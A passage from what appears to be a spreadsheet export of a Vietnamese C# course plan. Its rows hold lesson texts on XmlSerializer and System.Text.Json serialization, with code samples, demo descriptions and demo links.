2. Gọi `Serialize(...)` để ghi hoặc `Deserialize(...)` để đọc, thông qua `TextWriter`/`TextReader` hoặc `Stream`.
### Ví dụ: Product
```csharp
using System;
using System.IO;
using System.Xml.Serialization;
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; }
    public int Price { get; set; }
    private int cost = 3000;   // private: XmlSerializer sẽ bỏ qua
}
public class Program
{
    public static void Main()
    {
        var p = new Product { Id = 7, Name = "Bút", Price = 5000 };
        var xs = new XmlSerializer(typeof(Product));
        // Serialize: đối tượng thành chuỗi XML
        using var sw = new StringWriter();
        xs.Serialize(sw, p);
        string xml = sw.ToString();
        Console.WriteLine(xml);
        // &lt;Product&gt;
        //   &lt;Id&gt;7&lt;/Id&gt;
        //   &lt;Name&gt;Bút&lt;/Name&gt;
        //   &lt;Price&gt;5000&lt;/Price&gt;
        // &lt;/Product&gt;
        // (bản chạy thật còn có dòng khai báo xml và xmlns ở đầu; ở đây viết gọn)
        // Deserialize: chuỗi XML thành đối tượng mới
        using var sr = new StringReader(xml);
        var p2 = (Product)xs.Deserialize(sr)!;
        Console.WriteLine(p2.Name);   // Bút
    }
}
```
`Deserialize` trả về kiểu `object`, nên ta ép kiểu về `Product`.
## Quy tắc quan trọng của XmlSerializer
### Chỉ ghi thành viên public
`XmlSerializer` dùng reflection để tìm các thành viên **public** của lớp. Vì vậy:
- Thuộc tính và trường `public` được ghi thành phần tử XML.
- Trường `private`, `protected`, `internal` bị **bỏ qua hoàn toàn**. Trong ví dụ trên, `cost` không xuất hiện trong XML.
- Thuộc tính chỉ có `get` (không có `set`) cũng không được ghi, vì khi đọc lại không có cách nào gán giá trị vào. Thuộc tính cần cả `get` và `set` public.
Khi deserialize, trường private lấy giá trị khởi tạo ngay trong lớp (ở đây `cost` luôn là 3000), không đến từ XML.
### Lớp phải có constructor không tham số
Khi đọc XML, `XmlSerializer` cần tạo một đối tượng rỗng rồi gán từng thuộc tính vào. Vì vậy lớp phải là `public` và có **constructor không tham số** (parameterless constructor).
Nếu lớp chỉ có constructor có tham số, C# không tự thêm constructor mặc định nữa, và `new XmlSerializer(typeof(Product))` ném lỗi:
```
System.InvalidOperationException: There was an error reflecting type 'Product'.
 ---&gt; System.InvalidOperationException: Product cannot be serialized because it does not have a parameterless constructor.
```
Cách sửa là thêm `public Product() { }` (có thể để trống). Constructor có tham số vẫn giữ nguyên:
```csharp
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; }
    public Product() { }                 // thêm dòng này
    public Product(int id, string name)
    {
        Id = id;
        Name = name;
    }
}
```
### Không cần `[Serializable]`
Khác với cách cũ dùng `BinaryFormatter`, `XmlSerializer` **không yêu cầu** gắn `[Serializable]` lên lớp. Nếu bạn thấy thuộc tính này cùng với `XmlSerializer`, nó là thừa.
&gt; **Lưu ý:** `BinaryFormatter` là cơ chế cũ cần `[Serializable]`. Nó không an toàn và đã bị loại bỏ trong .NET 9, nên bài này không dạy. Với XML, chỉ cần `XmlSerializer`.
## Hoạt động: XmlSerializer qua ba tình huống
Mô phỏng dưới đây dùng lớp `Product` có ba thuộc tính public (`Id`, `Name`, `Price`) và một trường private `cost`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Serialize**. Cột trái là đối tượng `Product` (bảng thành viên), cột phải là XML. Sau `new XmlSerializer(typeof(Product))`, các thuộc tính public được tô sáng. `Id` thành `&lt;Id&gt;7&lt;/Id&gt;`, rồi `Name` và `Price` cũng thành các phần tử riêng, mỗi cái cùng màu với thuộc tính của nó. Ở bước kế tiếp, hàng `cost (private)` bị tô đỏ: không có thẻ nào cho nó.
- Chuyển sang tab **Deserialize**. Cột trái là chuỗi XML đầu vào, cột phải là `Product` mới. Constructor không tham số tạo ra đối tượng với giá trị mặc định (`Id = 0`, `Name = null`, `Price = 0`). Rồi từng thẻ được đọc: `Id = 7`, `Name = "Bút"`, `Price = 5000`. Cuối cùng `p.Name` in ra "Bút".
- Mở tab **Thiếu constructor không tham số**. Lớp `Product` chỉ có `Product(int id, string name)`. Bảng "Constructor của Product" cho thấy `Product()` là "không" (tô đỏ). Dòng `new XmlSerializer(typeof(Product))` ném `InvalidOperationException` với thông báo "Product cannot be serialized because it does not have a parameterless constructor." Khi thêm `public Product() { }`, dòng đó hiện màu xanh và chạy bình thường.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/xml-serialization/gioi-thieu-xml-serialization/" title="Giới thiệu XML Serialization" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `XmlSerializer` ánh xạ mỗi thuộc tính public thành một phần tử XML và bỏ qua phần private. Để đọc lại được, lớp phải public và có constructor không tham số.
## Tóm tắt
- `XmlSerializer` (trong `System.Xml.Serialization`) chuyển đối tượng thành XML bằng `Serialize` và ngược lại bằng `Deserialize`.
- Tạo bằng `new XmlSerializer(typeof(Kiểu))`; `Deserialize` trả về `object` nên cần ép kiểu.
- Chỉ thành viên **public** được ghi; trường private và thuộc tính chỉ có `get` bị bỏ qua.
- Lớp phải `public` và có **constructor không tham số**, nếu không sẽ gặp `InvalidOperationException`.
- Không cần `[Serializable]` với XML.</t>
        </is>
      </c>
    </row>
    <row r="58" ht="409.6" customHeight="1" s="18">
      <c r="A58" s="10" t="n">
        <v>58</v>
      </c>
      <c r="B58" s="10" t="inlineStr">
        <is>
          <t>6. Lưu trữ Đối tượng với Serialization</t>
        </is>
      </c>
      <c r="C58" s="10" t="inlineStr">
        <is>
          <t>JSON Serialization với System.Text.Json</t>
        </is>
      </c>
      <c r="D58" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu JSON Serialization trong C#</t>
        </is>
      </c>
      <c r="E58" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F58" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G58" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H58" s="10" t="inlineStr">
        <is>
          <t>Đọc được JSON và thấy kiểu dữ liệu C# tương ứng với kiểu JSON.</t>
        </is>
      </c>
      <c r="I58" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J58" s="10" t="inlineStr">
        <is>
          <t>Thẻ đối tượng ↔ JSON tô màu theo kiểu (chuỗi xanh lá, số cam, bool tím, null xám); ngoặc [ ] và { } được làm nổi; bảng chú giải kiểu bên cạnh.</t>
        </is>
      </c>
      <c r="K58" s="10" t="inlineStr">
        <is>
          <t>H19</t>
        </is>
      </c>
      <c r="L58" s="10" t="inlineStr">
        <is>
          <t>Đối tượng đơn | Có danh sách | Đối tượng lồng nhau</t>
        </is>
      </c>
      <c r="M58" s="10" t="inlineStr">
        <is>
          <t>Đối tượng đơn: Name (string) → "An", Age (int) → 20, IsActive (bool) → true, Email (null) → null.
Có danh sách: List&lt;string&gt; Skills → ["C#", "SQL"].
Lồng nhau: Address { City = "Hà Nội" } → "Address": { "City": "Hà Nội" }.
Bước cuối mỗi tab: JSON hoàn chỉnh.</t>
        </is>
      </c>
      <c r="N58" s="10" t="inlineStr">
        <is>
          <t>User mẫu</t>
        </is>
      </c>
      <c r="O58" s="10" t="inlineStr">
        <is>
          <t>string → "...", số → số, bool → true/false, List → [ ], đối tượng con → { }.</t>
        </is>
      </c>
      <c r="P58" s="10" t="inlineStr">
        <is>
          <t>Mặc định System.Text.Json mã hóa ký tự có dấu thành \uXXXX; muốn giữ tiếng Việt dễ đọc dùng JavaScriptEncoder.UnsafeRelaxedJsonEscaping (ghi chú ở bước cuối).</t>
        </is>
      </c>
      <c r="Q58" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/json-serialization-voi-system-text-json/gioi-thieu-json-serialization-trong-c-sharp/index.html</t>
        </is>
      </c>
      <c r="R58" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/json-serialization-voi-system-text-json/gioi-thieu-json-serialization-trong-c-sharp/</t>
        </is>
      </c>
      <c r="S58" s="10" t="n"/>
      <c r="T58" s="12" t="n"/>
      <c r="U58" s="12" t="n"/>
      <c r="V58" s="21" t="inlineStr">
        <is>
          <t>Giới thiệu JSON Serialization trong C#
Trong thế giới phát triển ứng dụng hiện đại, việc trao đổi dữ liệu giữa các hệ thống, ứng dụng di động, ứng dụng web và các dịch vụ backend là một hoạt động thiết yếu. Để làm được điều này một cách hiệu quả, chúng ta cần một định dạng dữ liệu chuẩn, dễ đọc, dễ viết và dễ phân tích bởi máy tính. Một trong những định dạng phổ biến nhất, nếu không muốn nói là phổ biến nhất hiện nay, chính là JSON.
JSON là gì và tầm quan trọng của nó
JSON (viết tắt của JavaScript Object Notation) là một định dạng trao đổi dữ liệu văn bản thuần túy, nhẹ, độc lập với ngôn ngữ và dễ đọc bởi con người. Mặc dù tên gọi có nhắc đến JavaScript, nhưng JSON đã vượt ra ngoài ranh giới của ngôn ngữ này và trở thành một tiêu chuẩn toàn cầu để biểu diễn dữ liệu có cấu trúc.
JSON được xây dựng dựa trên hai cấu trúc cơ bản:
Một tập hợp các cặp tên/giá trị (name/value pairs): Trong C#, cấu trúc này tương đương với các đối tượng (objects) hoặc từ điển (dictionaries).
Một danh sách các giá trị được sắp xếp (an ordered list of values): Trong C#, cấu trúc này tương đương với mảng (arrays) hoặc danh sách (lists).
Các loại dữ liệu cơ bản mà JSON hỗ trợ bao gồm chuỗi (string), số (number), boolean (true/false), null, đối tượng (object) và mảng (array).
Ví dụ về cấu trúc JSON:
{
  "tenSanPham": "Điện thoại thông minh X",
  "maSanPham": "SPX-2023",
  "gia": 999.99,
  "conHang": true,
  "thongSoKyThuat": {
    "ram": "8GB",
    "boNhoTrong": "128GB"
  },
  "mauSacPhoBien": [
    "Đen",
    "Trắng",
    "Xanh"
  ]
}
Tầm quan trọng của JSON:
Trao đổi dữ liệu Web API: JSON là định dạng mặc định cho hầu hết các RESTful API hiện đại, cho phép các ứng dụng frontend (web, di động) và backend giao tiếp một cách hiệu quả.
Tệp cấu hình: Nhiều ứng dụng sử dụng JSON để lưu trữ các tệp cấu hình (configuration files) do tính dễ đọc và dễ chỉnh sửa của nó.
Lưu trữ dữ liệu: Trong một số trường hợp, JSON được sử dụng để lưu trữ dữ liệu trong cơ sở dữ liệu NoSQL (như MongoDB) hoặc dưới dạng các tệp phẳng.
Tính độc lập ngôn ngữ: Bất kỳ ngôn ngữ lập trình nào cũng có thể tạo và phân tích cú pháp JSON, biến nó thành một "ngôn ngữ chung" cho dữ liệu.
Tính nhẹ và hiệu quả: Cú pháp của JSON gọn gàng hơn nhiều so với các định dạng khác như XML, giúp giảm dung lượng dữ liệu truyền tải và tăng tốc độ xử lý.
Trong C#, JSON Serialization là quá trình chuyển đổi một đối tượng C# (ví dụ: một instance của một class) thành một chuỗi JSON. Ngược lại, JSON Deserialization là quá trình chuyển đổi một chuỗi JSON trở lại thành một đối tượng C# tương ứng. Kỹ thuật này là nền tảng cho việc lưu trữ, tải dữ liệu và giao tiếp với các dịch vụ bên ngoài trong ứng dụng của bạn.
So sánh JSON với XML
Trước khi JSON trở nên phổ biến, XML (eXtensible Markup Language) là định dạng thống trị trong việc trao đổi dữ liệu. Mặc dù XML vẫn còn được sử dụng trong nhiều hệ thống cũ và các lĩnh vực chuyên biệt, JSON đã thay thế nó trong hầu hết các ứng dụng web và di động hiện đại nhờ vào sự đơn giản và hiệu quả vượt trội.
Hãy cùng xem xét sự khác biệt chính giữa hai định dạng này:
Cú pháp
XML: Sử dụng các thẻ (tags) để định nghĩa các phần tử và thuộc tính (attributes) để cung cấp thêm thông tin. Cú pháp của XML khá dài dòng và chi tiết.
&lt;SanPham maSanPham="SPX-2023"&gt;
    &lt;TenSanPham&gt;Điện thoại thông minh X&lt;/TenSanPham&gt;
    &lt;Gia&gt;999.99&lt;/Gia&gt;
    &lt;ConHang&gt;true&lt;/ConHang&gt;
    &lt;ThongSoKyThuat&gt;
        &lt;RAM&gt;8GB&lt;/RAM&gt;
        &lt;BoNhoTrong&gt;128GB&lt;/BoNhoTrong&gt;
    &lt;/ThongSoKyThuat&gt;
    &lt;MauSacPhoBien&gt;
        &lt;Mau&gt;Đen&lt;/Mau&gt;
        &lt;Mau&gt;Trắng&lt;/Mau&gt;
        &lt;Mau&gt;Xanh&lt;/Mau&gt;
    &lt;/MauSacPhoBien&gt;
&lt;/SanPham&gt;
JSON: Sử dụng các cặp khóa-giá trị (key-value pairs) và mảng. Cú pháp của JSON gọn gàng và dễ đọc hơn nhiều.
{
  "tenSanPham": "Điện thoại thông minh X",
  "maSanPham": "SPX-2023",
  "gia": 999.99,
  "conHang": true,
  "thongSoKyThuat": {
    "ram": "8GB",
    "boNhoTrong": "128GB"
  },
  "mauSacPhoBien": [
    "Đen",
    "Trắng",
    "Xanh"
  ]
}
Mục đích sử dụng
XML: Được thiết kế để biểu diễn dữ liệu có cấu trúc phức tạp, tài liệu và siêu dữ liệu. Nó hỗ trợ các tính năng mạnh mẽ như XML Schema để xác thực cấu trúc dữ liệu, XSLT để biến đổi tài liệu, và Namespace để tránh xung đột tên. Điều này khiến XML phù hợp với các ứng dụng yêu cầu tính mở rộng cao, xác thực chặt chẽ và xử lý tài liệu.
JSON: Tập trung vào việc trao đổi dữ liệu đơn giản, gọn nhẹ giữa các hệ thống. Nó được tối ưu hóa cho tốc độ và dễ dàng phân tích cú pháp, đặc biệt trong môi trường web và di động.
Ưu và nhược điểm tóm tắt
Với sự đơn giản, hiệu quả và tính phổ biến rộng rãi, JSON đã trở thành lựa chọn hàng đầu cho hầu hết các nhu cầu trao đổi dữ liệu trong phát triển ứng dụng C# hiện đại.
Giới thiệu System.Text.Json
Trong .NET, có nhiều thư viện khác nhau để làm việc với JSON. Trong một thời gian dài, Newtonsoft.Json (còn gọi là Json.NET) là tiêu chuẩn vàng và là thư viện được sử dụng rộng rãi nhất. Tuy nhiên, từ .NET Core 3.1 trở đi (và tiếp tục với .NET 5, 6, 7, 8...), Microsoft đã giới thiệu thư viện System.Text.Json như một giải pháp tích hợp sẵn (built-in) để xử lý JSON.
System.Text.Json được phát triển với các mục tiêu chính:
Hiệu suất cao: Được thiết kế để có hiệu suất vượt trội so với các thư viện JSON khác, đặc biệt là trong các kịch bản tải dữ liệu lớn.
Bảo mật: Giảm thiểu các rủi ro bảo mật tiềm ẩn thường gặp trong quá trình deserialization.
Tuân thủ tiêu chuẩn: Tuân thủ chặt chẽ các tiêu chuẩn JSON, đảm bảo tính tương thích.
Tích hợp sâu: Là một phần của framework .NET, giúp giảm bớt sự phụ thuộc vào các thư viện bên thứ ba.
Với System.Text.Json, bạn có thể dễ dàng chuyển đổi các đối tượng C# thành chuỗi JSON và ngược lại, tạo điều kiện thuận lợi cho việc lưu trữ cấu hình, giao tiếp với API web, và nhiều tác vụ khác. Vì là thư viện tích hợp, bạn không cần phải cài đặt thêm bất kỳ gói NuGet nào để sử dụng nó trong các dự án .NET hiện đại.
Trong các bài học tiếp theo, chúng ta sẽ đi sâu vào cách sử dụng System.Text.Json để thực hiện các tác vụ serialization và deserialization cơ bản, cũng như khám phá các tùy chọn nâng cao để tùy chỉnh quá trình này.</t>
        </is>
      </c>
      <c r="W58" s="22" t="inlineStr">
        <is>
          <t># Giới thiệu JSON Serialization trong C#
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích **JSON** là gì và vì sao nó phổ biến.
- Đọc một đoạn JSON gồm cặp khóa và giá trị, mảng, và đối tượng lồng nhau.
- Nối kiểu dữ liệu C# với kiểu JSON tương ứng.
- Nêu `System.Text.Json` là thư viện JSON có sẵn trong .NET hiện đại.
- Quan sát từng thuộc tính C# thành phần JSON nào bằng hoạt động mô phỏng.
## JSON là gì?
**JSON** (JavaScript Object Notation) là định dạng trao đổi dữ liệu dạng văn bản. Dù tên có chữ JavaScript, mọi ngôn ngữ đều đọc và ghi được JSON. Nó dễ đọc với người, gọn, và là định dạng mặc định của hầu hết Web API. Nhiều tệp cấu hình cũng dùng JSON.
JSON chỉ có hai cấu trúc chính:
- **Đối tượng** (object): các cặp `"khóa": giá trị` trong ngoặc nhọn `{ }`. Tương đương một đối tượng C# hoặc từ điển.
- **Mảng** (array): danh sách giá trị có thứ tự trong ngoặc vuông `[ ]`. Tương đương `List` hoặc mảng C#.
Giá trị có thể là chuỗi, số, `true`/`false`, `null`, đối tượng hoặc mảng.
```json
{
  "Name": "An",
  "Age": 20,
  "IsActive": true,
  "Email": null,
  "Skills": ["C#", "SQL"],
  "Address": { "City": "Hà Nội" }
}
```
### So sánh với XML
Cùng dữ liệu, JSON gọn hơn XML vì không phải lặp tên thẻ đóng:
| | JSON | XML |
|---|---|---|
| Cú pháp | Cặp khóa và giá trị, gọn | Thẻ mở và thẻ đóng, dài |
| Dùng nhiều ở | Web API, cấu hình hiện đại | Hệ thống cũ, tài liệu cần kiểm tra chặt (schema) |
## Serialization với System.Text.Json
**JSON Serialization** là biến đối tượng C# thành chuỗi JSON. **Deserialization** là chuyển chuỗi JSON trở lại thành đối tượng.
Từ .NET Core 3.1, .NET có sẵn thư viện **`System.Text.Json`**, nhanh và an toàn, nên không cần cài thêm gói NuGet. Lớp chính là `JsonSerializer` với hai phương thức: `Serialize` và `Deserialize&lt;T&gt;`. (Thư viện bên thứ ba `Newtonsoft.Json` cũng phổ biến nhưng bài này chỉ dùng `System.Text.Json`.)
### Kiểu C# thành kiểu JSON
| Kiểu C# | Kiểu JSON | Ví dụ |
|---|---|---|
| `string` | chuỗi, có nháy kép | `"Name": "An"` |
| `int`, `double`... | số, không nháy kép | `"Age": 20` |
| `bool` | `true` hoặc `false` (viết thường) | `"IsActive": true` |
| giá trị chưa có (`null`) | `null` | `"Email": null` |
| `List&lt;T&gt;`, mảng | mảng `[ ]` | `"Skills": ["C#", "SQL"]` |
| đối tượng con | đối tượng `{ }` lồng bên trong | `"Address": { ... }` |
### Ví dụ
```csharp
using System;
using System.Collections.Generic;
using System.Text.Json;
public class Address
{
    public string City { get; set; }
}
public class User
{
    public string Name { get; set; }
    public int Age { get; set; }
    public bool IsActive { get; set; }
    public string? Email { get; set; }
    public List&lt;string&gt; Skills { get; set; }
    public Address Address { get; set; }
}
public class Program
{
    public static void Main()
    {
        var u = new User
        {
            Name = "An",
            Age = 20,
            IsActive = true,
            Skills = new List&lt;string&gt; { "C#", "SQL" },
            Address = new Address { City = "Hanoi" }
        };
        string json = JsonSerializer.Serialize(u);
        Console.WriteLine(json);
        // {"Name":"An","Age":20,"IsActive":true,"Email":null,"Skills":["C#","SQL"],"Address":{"City":"Hanoi"}}
        User u2 = JsonSerializer.Deserialize&lt;User&gt;(json)!;
        Console.WriteLine(u2.Skills[1]);   // SQL
    }
}
```
Mặc định `Serialize` ghi chuỗi liền trên một dòng, và mã hóa ký tự có dấu thành `\uXXXX` (ví dụ "ú" thành `ú`). Dữ liệu vẫn đúng khi đọc lại. Nếu muốn giữ chữ có dấu trong chuỗi, dùng `JavaScriptEncoder.UnsafeRelaxedJsonEscaping` trong `JsonSerializerOptions`.
## Hoạt động: Thuộc tính C# thành JSON nào?
Mô phỏng dưới đây dựng JSON từng dòng từ đối tượng `User`. Cột trái là đối tượng C#, cột phải là JSON. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Đối tượng đơn**. `User` có `Name = "An"`, `Age = 20`, `IsActive = true`, `Email` chưa gán. Mỗi bước thêm một dòng vào JSON: chuỗi có nháy kép (`"Name": "An"`), số không nháy kép (`"Age": 20`), `bool` thành `true` viết thường, `Email` thành `null`. Mỗi giá trị cùng màu theo kiểu, có khung "Chú giải". Kết quả in ra là `{"Name":"An","Age":20,"IsActive":true,"Email":null}`.
- Chuyển sang tab **Có danh sách**. `User` có thêm `Skills` là `List&lt;string&gt;` chứa "C#" và "SQL". Danh sách thành cặp ngoặc vuông `[ ]` (được tô sáng), mỗi chuỗi là một phần tử, cách nhau dấu phẩy. Kết quả: `{"Name":"An","Skills":["C#","SQL"]}`.
- Mở tab **Đối tượng lồng nhau**. `User` có thuộc tính `Address` thuộc lớp `Address`. Đối tượng con thành một cặp ngoặc nhọn `{ }` riêng bên trong, chứa `"City": "Hà Nội"`. Kết quả có hai tầng ngoặc nhọn: `{"Name":"An","Address":{"City":"Hà Nội"}}`. Hình hiển thị xuống dòng cho dễ đọc, còn chuỗi thật được viết liền.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/json-serialization-voi-system-text-json/gioi-thieu-json-serialization-trong-c-sharp/" title="Giới thiệu JSON Serialization" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mỗi kiểu dữ liệu C# có một dạng tương ứng trong JSON. Chuỗi thành `"..."`, số thành số, `bool` thành `true`/`false`, `List` thành `[ ]`, đối tượng con thành `{ }`. Biết quy tắc này là bạn đọc được hầu hết JSON.
## Tóm tắt
- **JSON** là định dạng văn bản gọn, dễ đọc; gồm đối tượng `{ }` và mảng `[ ]`.
- **Serialize** biến đối tượng C# thành chuỗi JSON; **Deserialize** làm ngược lại.
- `System.Text.Json` có sẵn trong .NET hiện đại, lớp chính là `JsonSerializer`.
- `string` thành `"..."`, số thành số, `bool` thành `true`/`false`, `null` thành `null`.
- `List` thành mảng `[ ]` và đối tượng con thành `{ }` lồng nhau.</t>
        </is>
      </c>
    </row>
    <row r="59" ht="409.6" customHeight="1" s="18">
      <c r="A59" s="10" t="n">
        <v>59</v>
      </c>
      <c r="B59" s="10" t="inlineStr">
        <is>
          <t>6. Lưu trữ Đối tượng với Serialization</t>
        </is>
      </c>
      <c r="C59" s="10" t="inlineStr">
        <is>
          <t>JSON Serialization với System.Text.Json</t>
        </is>
      </c>
      <c r="D59" s="10" t="inlineStr">
        <is>
          <t>Sử dụng `System.Text.Json` cơ bản</t>
        </is>
      </c>
      <c r="E59" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F59" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G59" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H59" s="10" t="inlineStr">
        <is>
          <t>Biết 3 tùy chọn hay dùng và cái bẫy phân biệt chữ hoa thường khi đọc JSON.</t>
        </is>
      </c>
      <c r="I59" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J59" s="10" t="inlineStr">
        <is>
          <t>Hai khung JSON trước/sau khi đổi tùy chọn đặt cạnh nhau. Tab 3: thẻ đối tượng sau Deserialize có trường bị null/0 tô đỏ, sau khi bật tùy chọn chuyển xanh.</t>
        </is>
      </c>
      <c r="K59" s="10" t="inlineStr">
        <is>
          <t>H19</t>
        </is>
      </c>
      <c r="L59" s="10" t="inlineStr">
        <is>
          <t>WriteIndented | Tên camelCase | Đọc JSON chữ thường</t>
        </is>
      </c>
      <c r="M59" s="10" t="inlineStr">
        <is>
          <t>WriteIndented = false → một dòng; = true → xuống dòng, thụt lề.
PropertyNamingPolicy = JsonNamingPolicy.CamelCase → "Name" thành "name".
Đọc {"name":"An","age":20} vào Person (Name, Age) với tùy chọn mặc định → Name = null, Age = 0 vì không khớp chữ hoa thường.
Bật PropertyNameCaseInsensitive = true → Name = "An", Age = 20.
Bước cuối mỗi tab: tùy chọn đã dùng.</t>
        </is>
      </c>
      <c r="N59" s="10" t="inlineStr">
        <is>
          <t>Person An, 20</t>
        </is>
      </c>
      <c r="O59" s="10" t="inlineStr">
        <is>
          <t>Mặc định System.Text.Json phân biệt chữ hoa thường khi đọc; dùng PropertyNameCaseInsensitive hoặc đặt tên khớp.</t>
        </is>
      </c>
      <c r="P59" s="10" t="inlineStr">
        <is>
          <t>Trong ASP.NET Core, cấu hình web mặc định đã bật không phân biệt hoa thường; ứng dụng console thì không.</t>
        </is>
      </c>
      <c r="Q59" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/json-serialization-voi-system-text-json/su-dung-system-text-json-co-ban/index.html</t>
        </is>
      </c>
      <c r="R59" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/json-serialization-voi-system-text-json/su-dung-system-text-json-co-ban/</t>
        </is>
      </c>
      <c r="S59" s="10" t="n"/>
      <c r="T59" s="12" t="n"/>
      <c r="U59" s="12" t="n"/>
      <c r="V59" s="21" t="inlineStr">
        <is>
          <t>Giới thiệu System.Text.Json
Trong bài học trước, chúng ta đã tìm hiểu về khái niệm JSON Serialization và lý do nó trở thành một kỹ thuật không thể thiếu trong phát triển ứng dụng hiện đại. Giờ đây, chúng ta sẽ đi sâu vào cách thực hiện điều đó trong C# bằng thư viện System.Text.Json, một giải pháp tích hợp sẵn và hiệu quả được Microsoft cung cấp.
System.Text.Json là thư viện serialization/deserialization JSON mặc định trong .NET, được giới thiệu từ .NET Core 3.1 và tiếp tục được cải tiến trong các phiên bản .NET 5 trở lên. Nó được thiết kế để có hiệu suất cao và bảo mật tốt, là lựa chọn ưu tiên cho hầu hết các ứng dụng .NET mới.
Namespace System.Text.Json
Để bắt đầu sử dụng System.Text.Json, bạn chỉ cần đảm bảo rằng dự án của bạn đang nhắm mục tiêu đến .NET Core 3.1 trở lên (hoặc .NET 5/6/7/8). Thư viện này đã được tích hợp sẵn, không cần cài đặt thêm gói NuGet nào khác (trừ khi bạn cần các tính năng nâng cao nằm trong các gói mở rộng như System.Text.Json.Serialization.JsonConverter).
Các lớp và phương thức chính mà chúng ta sẽ làm việc đều nằm trong namespace System.Text.Json. Do đó, bạn sẽ thường thấy câu lệnh using System.Text.Json; ở đầu các file mã nguồn của mình.
Trong namespace này, lớp quan trọng nhất là JsonSerializer. Đây là lớp tĩnh cung cấp các phương thức chính để thực hiện quá trình serialization (chuyển đổi đối tượng thành chuỗi JSON) và deserialization (chuyển đổi chuỗi JSON thành đối tượng).
Các Phương Thức Chính: JsonSerializer.Serialize và JsonSerializer.Deserialize
JsonSerializer cung cấp hai nhóm phương thức chính để làm việc với JSON:
JsonSerializer.Serialize
Phương thức này chịu trách nhiệm chuyển đổi một đối tượng C# thành một chuỗi JSON. Có nhiều overload khác nhau, nhưng hai dạng phổ biến nhất là:
string Serialize&lt;TValue&gt;(TValue value, JsonSerializerOptions? options = null): Serialize một đối tượng thành chuỗi JSON.
void Serialize&lt;TValue&gt;(Stream utf8Json, TValue value, JsonSerializerOptions? options = null): Serialize một đối tượng và ghi trực tiếp ra một Stream (ví dụ: file, network stream).
Khi gọi Serialize, thư viện sẽ kiểm tra các thuộc tính công khai (public properties) của đối tượng và chuyển đổi chúng thành các cặp key-value trong JSON.
JsonSerializer.Deserialize
Phương thức này ngược lại, chuyển đổi một chuỗi JSON hoặc một luồng dữ liệu JSON thành một đối tượng C# tương ứng. Cũng có nhiều overload:
TValue? Deserialize&lt;TValue&gt;(string json, JsonSerializerOptions? options = null): Chuyển đổi chuỗi JSON thành đối tượng kiểu TValue.
object? Deserialize(string json, Type returnType, JsonSerializerOptions? options = null): Chuyển đổi chuỗi JSON thành đối tượng của một kiểu Type cụ thể.
TValue? Deserialize&lt;TValue&gt;(Stream utf8Json, JsonSerializerOptions? options = null): Đọc từ Stream và chuyển đổi thành đối tượng.
Khi gọi Deserialize, bạn cần cung cấp kiểu dữ liệu (TValue hoặc returnType) mà bạn muốn khôi phục từ chuỗi JSON. System.Text.Json sẽ cố gắng khớp các trường trong JSON với các thuộc tính của đối tượng C# đó.
Ví dụ Cơ Bản về Serialize và Deserialize
Hãy xem một ví dụ đơn giản với một lớp Book:
using System;
using System.Text.Json;
using System.Collections.Generic;
public class Book
{
    public string Title { get; set; }
    public string Author { get; set; }
    public int PublicationYear { get; set; }
    public decimal Price { get; set; }
    public List&lt;string&gt; Genres { get; set; } = new List&lt;string&gt;();
}
public class BasicSerializationExample
{
    public static void Main()
    {
        // 1. Tạo một đối tượng Book
        Book myBook = new Book
        {
            Title = "The Hitchhiker's Guide to the Galaxy",
            Author = "Douglas Adams",
            PublicationYear = 1979,
            Price = 12.99m,
            Genres = new List&lt;string&gt; { "Science Fiction", "Comedy" }
        };
        // 2. Serialize đối tượng thành chuỗi JSON
        string jsonString = JsonSerializer.Serialize(myBook);
        Console.WriteLine("JSON sau khi Serialize:");
        Console.WriteLine(jsonString);
        // Output sẽ là một chuỗi JSON không định dạng:
        // {"Title":"The Hitchhiker's Guide to the Galaxy","Author":"Douglas Adams","PublicationYear":1979,"Price":12.99,"Genres":["Science Fiction","Comedy"]}
        // 3. Deserialize chuỗi JSON ngược lại thành đối tượng Book
        Book? deserializedBook = JsonSerializer.Deserialize&lt;Book&gt;(jsonString);
        if (deserializedBook != null)
        {
            Console.WriteLine("\nĐối tượng sau khi Deserialize:");
            Console.WriteLine($"Tiêu đề: {deserializedBook.Title}");
            Console.WriteLine($"Tác giả: {deserializedBook.Author}");
            Console.WriteLine($"Năm xuất bản: {deserializedBook.PublicationYear}");
            Console.WriteLine($"Giá: {deserializedBook.Price}");
            Console.WriteLine($"Thể loại: {string.Join(", ", deserializedBook.Genres)}");
        }
    }
}
Trong ví dụ trên, chúng ta đã thành công chuyển đổi một đối tượng Book thành chuỗi JSON và sau đó khôi phục nó trở lại thành một đối tượng Book y hệt.
Các Tùy Chọn Serialization Cơ Bản (JsonSerializerOptions)
